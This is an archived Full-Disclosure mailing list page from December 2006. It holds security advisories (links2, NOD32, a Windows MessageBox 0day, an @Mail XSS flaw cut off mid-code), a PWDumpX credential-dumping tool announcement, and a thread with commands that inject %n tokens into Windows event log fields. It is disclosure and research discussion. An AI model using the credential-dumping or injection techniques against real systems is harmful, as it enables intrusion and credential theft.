[Full-disclosure] [SECURITY] [DSA-1240-1] New links2 packages fix arbitrary shell command execution

2006-12-21 Thread Steve Kemp

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


- 
Debian Security Advisory DSA-1240-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
December 21, 2006
- 

Package: links2
Vulnerability  : insufficient escaping
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2006-5925
Debian Bug : 400718

Teemu Salmela discovered that the links2 character mode web browser
performs insufficient sanitising of smb:// URIs, which might lead to the
execution of arbitrary shell commands.

For the stable distribution (sarge) this problem has been fixed in
version 2.1pre16-1sarge1.

For the upcoming stable distribution (etch) this problem has been
fixed in version 2.1pre26-1.

For the unstable distribution (sid) this problem has been fixed in
version 2.1pre26-1.

We recommend that you upgrade your links2 package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian 3.1 (stable)
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1.diff.gz
Size/MD5 checksum:28658 a83c79990bbfb6f9ec26d737f767ee90
  
http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16.orig.tar.gz
Size/MD5 checksum:  4217483 7baf4fc20cc244d80ead21cebff07d89
  
http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1.dsc
Size/MD5 checksum:  841 ed4853334b7eebef055271df06cdcd7a

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_alpha.deb
Size/MD5 checksum:  2110324 b3633fddb199c45339d3837bb0a519a0

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_amd64.deb
Size/MD5 checksum:  2040922 5fb402e6a833709741d20238346c7597

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_arm.deb
Size/MD5 checksum:  1996004 c7c79ddcb82d5758668ed71d74b9685f

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_i386.deb
Size/MD5 checksum:  1997426 4c1ef611e31c57583f7471653962a84a

m68k architecture (Motorola Mc680x0)

  
http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_m68k.deb
Size/MD5 checksum:  1904084 e5c777a07eaa88f4367b51d88c556a14

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/l/links2/links2_2.1pre16-1sarge1_mips.deb
Size/MD5 checksum:  2034596 22854de6eaf3aa1e392291760e85e5e8


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFFil26wM/Gs81MDZ0RAvPPAJ9cxthVIvv2w2UmXuzhiiPR21aOjgCgo7J8
vA5Gql5VNhz4zm/QV5K4pig=
=JT/Q
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] New Windows tool - PWDumpX v1.1 (with CacheDump functionality)

2006-12-21 Thread Reed Arvin
New Windows tool - PWDumpX v1.1 (with CacheDump functionality)

Tool location: http://reedarvin.thearvins.com/tools/PWDumpX11.zip

=

Description:

PWDumpX version 1.1 allows a user with administrative privileges to
retrieve the domain password cache, password hashes and LSA secrets
from a Windows system. This tool can be used on the local system or on
one or more remote systems.

If an input list of remote systems is supplied, PWDumpX will attempt
to obtain the domain password cache, the password hashes and the LSA
secrets from each remote Windows system in a multi-threaded fashion
(up to 64 systems simultaneously).

The domain password cache, password hashes and LSA secrets from remote
Windows systems are encrypted as they are transfered over the network.
No data is sent over the network in clear text.

This tool is a completely re-written version of CacheDump, PWDump3e
and LSADump2 which integrates suggestions/bug fixes for PWDump3e and
LSADump2 found on various web sites, etc.

Source code included.

Credits:

My intent with including the source code along with this tool is to
give something back to the I.T. security community. I learned a lot
while creating PWDumpX but I could not have done it without the
original source code for CacheDump, PWDump2, PWDump3e, and LSADump2.
So...thanks to the creators of these tools for being generous enough
to include the source code with these tools so that hungry minds can
learn new things.

=

Tool homepage: http://reedarvin.thearvins.com/tools.html

Written by Reed Arvin [EMAIL PROTECTED].

Thank you,

Reed Arvin [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [WEB SECURITY] comparing information security to other industries

2006-12-21 Thread Jason Muskat, GCFA, GCUX, de VE3TSJ
Hello,

People, programmers, computers, software, design patterns, systems, and
infrastructure are constantly changing, often being reinvented. As such,
will never be stable.

Concrete of a type is always the same and therefore predictable. One can
state with certainly that a concrete slab will perform to design. This will
ever be possible in IT.

Many commercially produced software products don¹t have any warranty. Many
even state that the software is not warranted for any function or purpose.
... The fact that the software does something that one thinks it should do
is incidental. 


Regards,

-- 
Jason Muskat  | GCFA, GCUX - de VE3TSJ

TechDude
e. [EMAIL PROTECTED]
m. 416 .414 .9934

http://TechDude.Ca/



From: KT [EMAIL PROTECTED]
Date: Tue, 19 Dec 2006 12:16:29 -0800
To: full-disclosure@lists.grok.org.uk, [EMAIL PROTECTED]
Subject: [WEB SECURITY] comparing information security to other industries

So we have been dealing with information security from last 20 years and
still the world is at large lost. We still see banks vulnerable to trivial
XSS attacks and software broken by buffer overflows. How do we compare to
other industries like construction, engineering, finance? What I am trying
to figure out is how mature we are and how long will it take for to get
stable?


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Windows is very holy

2006-12-21 Thread Aaron Gray

Windows is very very holy.

Microsoft may draw castles guarded by lions round PC's in adverts but we
know better.

Aaron
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] NOD32 Antivirus CAB parsing Arbitrary Code Execution Advisory

2006-12-21 Thread security
n.runs AG  
http://www.nruns.com/  security at nruns.com
n.runs-SA-2006.005   21-Dec-2006


Vendor: ESET, http://eset.com
Affected Products:  ESET NOD32 Antivirus
Vulnerability:  Arbitrary Code Execution (remote) 
Risk: HIGH



Vendor communication:

  2006/08/24initial notification of ESET 
  2006/08/28ESET Response
  2006/08/29PGP keys exchange
  2006/08/29PoC files sent to ESET
  2006/09/06ESET initial feedback.
  2006/09/08ESET confirmed the bug and fixed
  2006/09/08ESET made available the updates


Overview:
 
Founded in 1992, ESET is a global provider of security software for
enterprises and consumers. ESET's award-winning, antivirus software system,
NOD32, provides real-time protection from known and unknown viruses,
spyware, rootkits and other malware. NOD32 offers the smallest, fastest and
most advanced protection available, with more Virus Bulletin 100% Awards
than any other antivirus product. ESET was named to Deloitte's Technology
Fast 500 five years running, and has an extensive partner network, including
corporations like Canon, Dell and Microsoft. ESET has offices in Bratislava,
SK; Bristol, U.K.; Buenos Aires, AR; Prague, CZ; San Diego, USA; and is
represented worldwide in more than 100 countries. 
The broad product platform protects Windows, Linux, Novell and MS DOS
machines.

Description:
A remotely exploitable vulnerability has been found in the file parsing
engine.

In detail, the following flaw was determined:

- Heap Overflow through Integer Overflow in .CAB file parsing

This problem can lead to remote arbitrary code execution if an attacker
carefully crafts a file that exploits the aforementioned vulnerability. The
vulnerability is present in NOD32 Antivirus software versions prior to the
update v.1.1743.

Solution:
The vulnerability was reported on Aug 24 and an update has been issued on
Sep 08 to solve this vulnerability through the regular update mechanism.



Credit: 
Bugs found by Sergio Alvarez of n.runs AG. 


The information provided is released by n.runs as is without warranty of
any kind. n.runs except all warranties, either express or implied, expect
for the warranties of merchantability. In no event shall n.runs be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if n.runs
has been advised of the possibility of such damages.
Distribution or Reproduction of the information is provided that the
advisory is not modified in any way.

Copyright 2006 n.runs. All rights reserved. Terms of use.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Tele2 - Versatel and Vivendi - exploit PATCHED

2006-12-21 Thread CyTRAP Labs - advisory
This vulnerability has been patched successfully by the vendor as tests by 
various parties have demonstrated, more details here:

http://cytrap.eu/blog/?p=133

Happy Holidays
Urs E. Gattiker
CyTRAP Labs and www.CASEScontact.org


At 21:23 2006-10-04, you wrote:
--

Message: 2
Date: Wed, 04 Oct 2006 13:56:27 +0200
Subject: [Full-disclosure] Tele2 - Versatel and Vivendi - exploit
To: full-disclosure@lists.grok.org.uk
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain; charset=us-ascii; format=flowed

Tele 2 has recently announced that it is selling its Benelux assets
to Versatel and yesterday it informed the media that it intends to do
the same with its French assets, selling those to Vivendi.

The company that touts itself as providing economical broadband and
telecommunication services does, however, have a slight problem
regarding information security.

A vulenrability is being taken advantage off by various groups of
people and, in turn, this could harm home users that receive their
broadband and fixed-line services from Tele2.

In fact, several security features can be de-activated allowing a
malicious user to take control of a user's PC, his broadband
connection as well as his phone line as described here with a screen shot:

http://cytrap.eu/blog/?p=57

This is another example where user's face risks regarding their
internet connection they might not even be aware of. Another one of
those is the recent Fon example also circulated on this list.

Urs E. Gattiker
CyTRAP Labs  CASEScontact.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-21 Thread 3APA3A
Dear full-disclosure@lists.grok.org.uk,

  Since  it's  already  wide  spread on the public forums and exploit is
  published  on  multiple  sites and there is no way to stop it, I think
  it's time to alert lists about this.

  On the one of Russian forums:
  http://www.kuban.ru/forum_new/forum2/files/19124.html
  message  was  published  by  NULL  about  vulnerability  in Windows on
  processing   MessageBox()   with   MB_SERVICE_NOTIFICATION   flag  and
  message/caption  beggining with \??\. Vulnerability seems to be memory
  corruption  in  kernel  and  causes  system  crash  or  hang after few
  attempts.  It  seems  to happen because message is logged to event log
  and may point to some problem with event logs processing.

  Vulnerability details and code may be found here:
  http://www.security.nnov.ru/Gnews944.html

  There  is  potential  remote  exploitation vector if some service uses
  user-supplied  input  for  MessageBox() function. Messenger service is
  not  vulnerable  in  this way, because it prepends user-supplied input
  with additional string.

  I contacted Microsoft on this issue on December, 16.

-- 
http://www.security.nnov.ru
 /\_/\
{ , . } |\
+--oQQo-{ ^ }-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] SinFP 2.06, now works under big-endian architectures

2006-12-21 Thread GomoR
Hello,

SinFP is a new approach to OS fingerprinting, which bypasses 
limitations that nmap has. More info:
http://www.gomor.org/sinfp .

SinFP has now 140 signatures.

You can download it via CPAN, or via SourceForge:
https://sourceforge.net/projects/sinfp

Also, two benchmarks versus Nmap have been done:
http://www.phocean.net/index.php/post/2006/12/17/SinFP
http://www.computerdefense.org/?p=173

This new release has been tested under Solaris 8/SPARC, 
and Mac OS X/PPC.

Example advanced usage:
# sinfp.pl -kai www.heise.de
P1: B0 F0 W0 O0 M0
P2: B3 F0x12 W4320 O0204010303000101080a4445414401010402 M1440
P3: B11123 F0x14 W0 O0 M0
IPv4: unknown
##
## Retry in offline active mode:
##
# sinfp.pl -1 -f sinfp4-193.99.144.85.80.pcap -H
P2: B3 F0x12 W4320 O0204010303000101080a4445414401010402 M1440
IPv4: BH0FH0WH2OH0MH1/P2: Unix: IRIX: 6.5

-- 
  ^  ___  ___ http://www.GomoR.org/  -+
  | / __ |__/  Systems  Security Engineer |
  | \__/ |  \ ---[ zsh$ alias psed='perl -pe ' ]---|
  +--  Net::Frame = http://search.cpan.org/~gomor/  ---+

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread 3APA3A
Dear full-disclosure@lists.grok.org.uk,

There  is  interesting  thing  with  event  logging on Windows. The only
security  aspect  of  it  is  event log record tampering and performance
degradation,  but  it may become sensitive is some 3rd party software is
used for automated event log analysis.

The   problem   is   a  kind  of  Format  string  vulnerability  where
user-supplied  input  is  used  for  event log record. For ReportEvent()
function  %1,  %2,  etc  have  a  special  meaning and are replaced with
corresponding  string  from  lpStrings.  The problem is this can be done
recursively.  That is, %2 argument can include itself. This fact doesn't
lead  to  any  buffer  overflow,  but  you  can  fill entire buffer with
relatively small argument.

Most  services  do  not escape any user-supplied input then constructing
log  event.  You  can  see very interesting event log entries if you try
something like:

net send SOMEHOST %2

or

net use \\SOMEHOST\IPC$ /user:%1%2%3


-- 
http://www.security.nnov.ru
 /\_/\
{ , . } |\
+--oQQo-{ ^ }-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] n3td3v calls on month of bug campaigns to stop

2006-12-21 Thread n3td3v
[introduction]
n3td3v is deeply sad at the new trend of morally accepted blackmail by
the security community, known better as a month of bugs.

sincere researchers are coming forward more frequently to threaten
companies with a month of vendor bugs.

because they are known to be sincere they are morally left off the
hook from what is known by n3td3v to be straight forward blackmail.

blackmail is illegal, for this reason n3td3v wishes to make the
following recommendations:

[1]bug a day for a month campaigns are blackmail on the part of the
researcher, all should be outlawed by government.

[2]n3td3v calls on the government to make it highly illegal and
morally unacceptable to threaten a month of bugs for a vendor and its
customers

[3]security researchers think its fun but all it amounts to is blackmail

[4]all blackmail attempts shouldn't be dressed up as harmless fun

[5]governments need to wake up and swiftly arrest those making month
of bug claims in the future

[6]corporations and its consumers shouldn't be scared mongered and
threatened by individuals

[7]researchers shouldn't use their real name or real place of
employment and expect exclusion from legal action against blackmail

[8]researchers shouldn't be allowed to profit or gain career
opportunities by such claims to action by the researcher

[9]researchers should be taken into custody, questioned and have their
hardware obtained for forensic analysis before a month of bugs is due
to start

[10]individuals threatening to carry out a month of bugs shouldn't be
labelled as security researchers by the media and security experts

[11]such individuals should be clearly labelled as criminals,
malicious attackers and blackhats, no matter what other friendly
or useful research they've carried out in the past.

[media dork reference]
http://news.com.com/2061-10793_3-6144833.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] n3td3v calls on month of bug campaigns to stop

2006-12-21 Thread Timo Schoeler
n3td3v wrote:
 [introduction]
 n3td3v is deeply sad at the new trend of morally accepted blackmail by
 the security community, known better as a month of bugs.
 
 sincere researchers are coming forward more frequently to threaten
 companies with a month of vendor bugs.
 
 because they are known to be sincere they are morally left off the
 hook from what is known by n3td3v to be straight forward blackmail.
 
 blackmail is illegal, for this reason n3td3v wishes to make the
 following recommendations:
 
 [1]bug a day for a month campaigns are blackmail on the part of the
 researcher, all should be outlawed by government.
 
 [2]n3td3v calls on the government to make it highly illegal and
 morally unacceptable to threaten a month of bugs for a vendor and its
 customers
 
 [3]security researchers think its fun but all it amounts to is blackmail
 
 [4]all blackmail attempts shouldn't be dressed up as harmless fun
 
 [5]governments need to wake up and swiftly arrest those making month
 of bug claims in the future
 
 [6]corporations and its consumers shouldn't be scared mongered and
 threatened by individuals
 
 [7]researchers shouldn't use their real name or real place of
 employment and expect exclusion from legal action against blackmail
 
 [8]researchers shouldn't be allowed to profit or gain career
 opportunities by such claims to action by the researcher
 
 [9]researchers should be taken into custody, questioned and have their
 hardware obtained for forensic analysis before a month of bugs is due
 to start
 
 [10]individuals threatening to carry out a month of bugs shouldn't be
 labelled as security researchers by the media and security experts
 
 [11]such individuals should be clearly labelled as criminals,
 malicious attackers and blackhats, no matter what other friendly
 or useful research they've carried out in the past.
 
 [media dork reference]
 http://news.com.com/2061-10793_3-6144833.html

there's one extremely simple solution: write good code!

furthermore, vendors who sell crap deserve to be blamed to do so. 
Mercedes-Benz' sales of their E-Class went down enourmously when the 
fact was known that it was extremely poorly engineered, especially wrt 
electrics.

no one could fill a whole month of bugs (a bug/day) when the vendor did 
good (!) work.

it's, again, a thing capitalism enforces. vendors sell immature 
soft-/hardware, and services, and let the customers do the beta testing. 
*that* should be defined illegal by governments! but guess what -- most, 
if not all of the western countries can be defined as fascist countries 
as (huge) corporations are the real entities in power.

that given, the guys you call 'blackmailers' are like Robin Hood. 
they're heroes.

(it was the same with brazil some months ago; they told the pharmacy 
corporations to sell their drugs for HIV infected people at a reasonable 
price to the brazilian govt, otherwise the govt would ignore patents and 
re-engineer and build the drugs themselves. again, the govt was 
perfectly right. however, pharmacy corporations' PR guys knew this and 
so they sold and sell the medicine to the price brazil was willing to 
pay...)

-- 
Timo Schoeler | http://riscworks.net/~tis | [EMAIL PROTECTED]
RISCworks -- Perfection is a powerful message
Ex-ISP | RISC aficinados | Networking, Security, OpenBSD services
GPG Key fingerprint = l33t

What are you gonna do? Release the dogs?! Or the bees?! Or dogs with 
bees in their mouth so that when they bark they shoot bees at you? 
(Homer J. Simpson)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread endrazine
Heya lists  3APA3A,

3APA3A a écrit :
 Dear full-disclosure@lists.grok.org.uk,

 There  is  interesting  thing  with  event  logging on Windows. The only
 security  aspect  of  it  is  event log record tampering and performance
 degradation,  but  it may become sensitive is some 3rd party software is
 used for automated event log analysis.

 The   problem   is   a  kind  of  Format  string  vulnerability  where
 user-supplied  input  is  used  for  event log record. For ReportEvent()
 function  %1,  %2,  etc  have  a  special  meaning and are replaced with
 corresponding  string  from  lpStrings.  
It looks more like a variable replacement (like $0 $1 ... in bash shell) 
than a format string issue to me.
And it seems indeed to be a relevant information disclosure bug.


Cheers,

endrazine-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Microsoft Windows XP/2003/Vista memory corruption 0day

2006-12-21 Thread 3APA3A
Dear lists,

in  another  Russian  forum, Killer{R} made analysis on this issue using
Windows 2000 sources:

http://bugtraq.ru/cgi-bin/forum.mcgi?type=sbb=21m=140672

The  problem is in win32k.sys' function GetHardErrorText, which tries to
prepare  EXCEPTION  data  for  event  log, and seems to be some very old
debugging feature accidently left in production code since Windows 2000.

In Windows 2000 there is a peace of code like:

} else if ((asLocal.Length  4)  !_strnicmp(asLocal.Buffer, \\??\\, 4)) {
strcpy( asLocal.Buffer, asLocal.Buffer+4 );

Killer{R}  assumes  the problem is in strcpy(), because it should not be
used for overlapping buffers, but at least ANSI implementation of strcpy
from  Visual  C  should be safe in this very situation (copying to lower
addresses).  May be code is different for Windows XP or vulnerability is
later in code.



--Thursday, December 21, 2006, 2:58:17 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

3 Dear full-disclosure@lists.grok.org.uk,

3   Since  it's  already  wide  spread on the public forums and exploit is
3   published  on  multiple  sites and there is no way to stop it, I think
3   it's time to alert lists about this.

3   On the one of Russian forums:
3   http://www.kuban.ru/forum_new/forum2/files/19124.html
3   message  was  published  by  NULL  about  vulnerability  in Windows on
3   processing   MessageBox()   with   MB_SERVICE_NOTIFICATION   flag  and
3   message/caption  beggining with \??\. Vulnerability seems to be memory
3   corruption  in  kernel  and  causes  system  crash  or  hang after few
3   attempts.  It  seems  to happen because message is logged to event log
3   and may point to some problem with event logs processing.

3   Vulnerability details and code may be found here:
3   http://www.security.nnov.ru/Gnews944.html

3   There  is  potential  remote  exploitation vector if some service uses
3   user-supplied  input  for  MessageBox() function. Messenger service is
3   not  vulnerable  in  this way, because it prepends user-supplied input
3   with additional string.

3   I contacted Microsoft on this issue on December, 16.



-- 
~/ZARAZA
http://www.security.nnov.ru/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread Michele Cicciotti
 There  is  interesting  thing  with  event  logging on Windows. The only
 security  aspect  of  it  is  event log record tampering and performance
 degradation,  but  it may become sensitive is some 3rd party software is
 used for automated event log analysis.

I doubt this. The event logs don't contain the actual formatted string, because 
the template string is localized and only retrieved when the entry is displayed 
- what is logged is just a message id and the string inserts (see documentation 
for EVENTLOGRECORD). FormatMessage (which is used to build the full message to 
display to the user) isn't the culprit, either, because it doesn't operate 
recursively (that would have bizarre consequences, since FormatMessage also 
performs automatic line wrapping and indenting) - to prove it quickly and 
cheaply, make a copy of ntoskrnl.exe as %1.exe and try to run it: the error 
message you get back is prepared with FormatMessage (see kernel32, message 
table, entry 129), and it doesn't exhibit recursion

I think this is just a fairly minor bug/feature of the standard event log 
viewer, and wouldn't affect log analyzers, unless they implement this 
counterintuitive behavior (that was probably coded to support some pathological 
case where a single pass of formatting wasn't enough). But I expect log 
analyzers would rather work with the message source + id than the formatted 
display message, anyway

 Most  services  do  not escape any user-supplied input then constructing
 log  event.

They are not supposed to, in fact that would damage the log. A human being 
might be fooled (for example you could embed newlines and fake fields in 
multi-line messages), but an automatic analysis tool will always see exactly 
the parameters passed


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread Tim


  There  is  interesting  thing  with  event  logging on Windows. The only
  security  aspect  of  it  is  event log record tampering and performance
  degradation,  but  it may become sensitive is some 3rd party software is
  used for automated event log analysis.

Log tampering is a big concern, since it is trivial to change the
meaning of logs without touching the .evt files themselves.

However, there are other security concerns, at least when it comes to
the event viewer.  It downloads DLLs from remote systems when viewing
remote logs, parses the message resources and uses them to determine the
meaning of remote logs.  Anyone played with fuzzing the PE file format?


  The   problem   is   a  kind  of  Format  string  vulnerability  where
  user-supplied  input  is  used  for  event log record. For ReportEvent()
  function  %1,  %2,  etc  have  a  special  meaning and are replaced with
  corresponding  string  from  lpStrings.  
 It looks more like a variable replacement (like $0 $1 ... in bash shell) 
 than a format string issue to me.
 And it seems indeed to be a relevant information disclosure bug.

I have studied the FormatMessage() interface in my attempt to interpret
event logs[1], but I had no idea that the %n elements were replaced
recursively.  That could be significant, since format strings *can* be
included as a modifier for those elements.  See [2] for more details.

3APA3A, have you tried to see if elements like %n!FORMAT! used
recursively will invoke the wsprintf()-like behavior??

cheers,
tim


[1] http://projects.sentinelchicken.org/grokevt/

[2] http://msdn.microsoft.com/library/en-us/debug/base/formatmessage.asp

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread Michele Cicciotti
 There  is  interesting  thing  with  event  logging on Windows. The only
 security  aspect  of  it  is  event log record tampering and performance
 degradation,  but  it may become sensitive is some 3rd party software is
 used for automated event log analysis.

I doubt this. The event logs don't contain the actual formatted string, because 
the template string is localized and only retrieved when the entry is displayed 
- what is logged is just a message id and the string inserts (see documentation 
for EVENTLOGRECORD). FormatMessage (which is used to build the full message to 
display to the user) isn't the culprit, either, because it doesn't operate 
recursively (that would have bizarre consequences, since FormatMessage also 
performs automatic line wrapping and indenting) - to prove it quickly and 
cheaply, make a copy of ntoskrnl.exe as %1.exe and try to run it: the error 
message you get back is prepared with FormatMessage (see kernel32, message 
table, entry 129), and it doesn't exhibit recursion

I think this is just a fairly minor bug/feature of the standard event log 
viewer, and wouldn't affect log analyzers, unless they implement this 
counterintuitive behavior (that was probably coded to support some pathological 
case where a single pass of formatting wasn't enough). But I expect log 
analyzers would rather work with the message source + id than the formatted 
display message, anyway

 Most  services  do  not escape any user-supplied input then constructing
 log  event.

They are not supposed to, in fact that would damage the log. A human being 
might be fooled (for example you could embed newlines and fake fields in 
multi-line messages), but an automatic analysis tool will always see exactly 
the parameters passed


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] SQID v0.1 - SQL Injection Digger.

2006-12-21 Thread Metaeye SG
SQL injection digger is a command line program that looks for SQL
injections and common errors in websites.Current version looks for SQL
injections and common errors in website urls found by performing a
google search.

Sqiud can be downloaded from http://sqid.rubyforge.org.

--
MSG // http://www.metaeye.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread 3APA3A
Dear Tim,

--Thursday, December 21, 2006, 6:41:11 PM, you wrote to [EMAIL PROTECTED]:


T 3APA3A, have you tried to see if elements like %n!FORMAT! used
T recursively will invoke the wsprintf()-like behavior??

Yes, I did. It doesn't work.

-- 
~/ZARAZA
Но ведь кому угодно могут прийти в голову яйца, пятки и епископы. (Лем)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fun with event logs (semi-offtopic)

2006-12-21 Thread 3APA3A
Dear Michele Cicciotti,

--Thursday, December 21, 2006, 6:20:54 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

 There  is  interesting  thing  with  event  logging on Windows. The only
 security  aspect  of  it  is  event log record tampering and performance
 degradation,  but  it may become sensitive is some 3rd party software is
 used for automated event log analysis.

MC I doubt this. The event logs don't contain the actual formatted
MC string, because the template string is localized and only retrieved
MC when the entry is displayed - what is logged is just a message id
MC and the string inserts (see documentation for EVENTLOGRECORD).
MC FormatMessage (which is used to build the full message to display to
MC the user) isn't the culprit, either, because it doesn't operate
MC recursively (that would have bizarre consequences, since

As  I  wrote,  my message is semi-offtopic, because it's more fun than
any  security  vulnerability  here.

Yes,  probably  this  bug  only  affects  event  viewer  itself. I don't
understand  how  and why Microsoft achieved this effect in event viewer,
which  is,  by  the  way,  security tool, and if it's hard for different
vendor  to  make  same  mistake. It doesn't look like Easter egg, but if
FormatMessage  does  not recursion it needs to be specially coded and it
does  nothing  except this bug. Bug, that needs to be specially coded is
new funny bug category, isn't it?

-- 
~/ZARAZA
http://www.security.nnov.ru/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [NETRAGARD-20061220 SECURITY ADVISORY] [EMAIL PROTECTED] WebMail Cross Site Scripting Vulnerabilitity]

2006-12-21 Thread Netragard Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 Netragard,  L.L.C  Advisory* ***


 Strategic Reconnaissance Team

  
  http://www.netragard.com -- We make I.T. Safe.





[POSTING NOTICE]
- --
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.

a href=http://www.netragard.com/html/recent_research.html
Netragard Research
/a





[About Netragard]
- --
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools.  This advisory is the
product of research done by the Strategic Reconnaissance Team.





[Advisory Information]
- --
Contact : Adriel T. Desautels
Researcher  : Philippe C. Caturegli
Advisory ID : NETRAGARD-20061206
Product Name: @ Mail
Product Version : 4.51
Vendor Name : Calacode
Type of Vulnerability   : XSS with filter evasion technique.
Effort  : Easy

- --
Netragard Security Note:

Source code obfuscation does not reduce the risk profile of any
application as it has no impact on vulnerabilities that might exist
within a particular application. @Mail code was obfuscated using basic
obfuscation techniques.





[Product Description]
- --
@Mail is a feature rich Email Solution, providing a complete WebMail
interface for accessing email-resources via a web-browser or wireless
device.


- --http://www.atmail.com--





[Technical Summary]
- --
@Mail does not properly sanitize email. While @Mail does pre-append
a DEFANGED_ tag to detected HTML tags, it does not properly detect
SCRIPT/XSS tags. This failure makes @Mail vulnerable to Cross-site
Scripting Attacks (XSS) via filter evasion.





[Technical Details]
- --
@Mail renders HTML emails by default. (Note: we did not find a way to
disable this feature.) The emails that are received are parsed by the
following code located in Global.pm which disarms basic XSS attacks.





- ---8--- SNIP Global.pm line 626 - 635 SNIP ---8---
my ( $I1I11I11I11I, $I1I111III1II );$_ =
$III1II1II1II-II1II1I11111($I1I1II1II1I11II1);if (//)
{s/(META|APP|SCRIPT|OBJECT|EMBED|FRAME|IFRAME|BASE|BODY)(\s|)/DEFANGED_$1$2/gi;
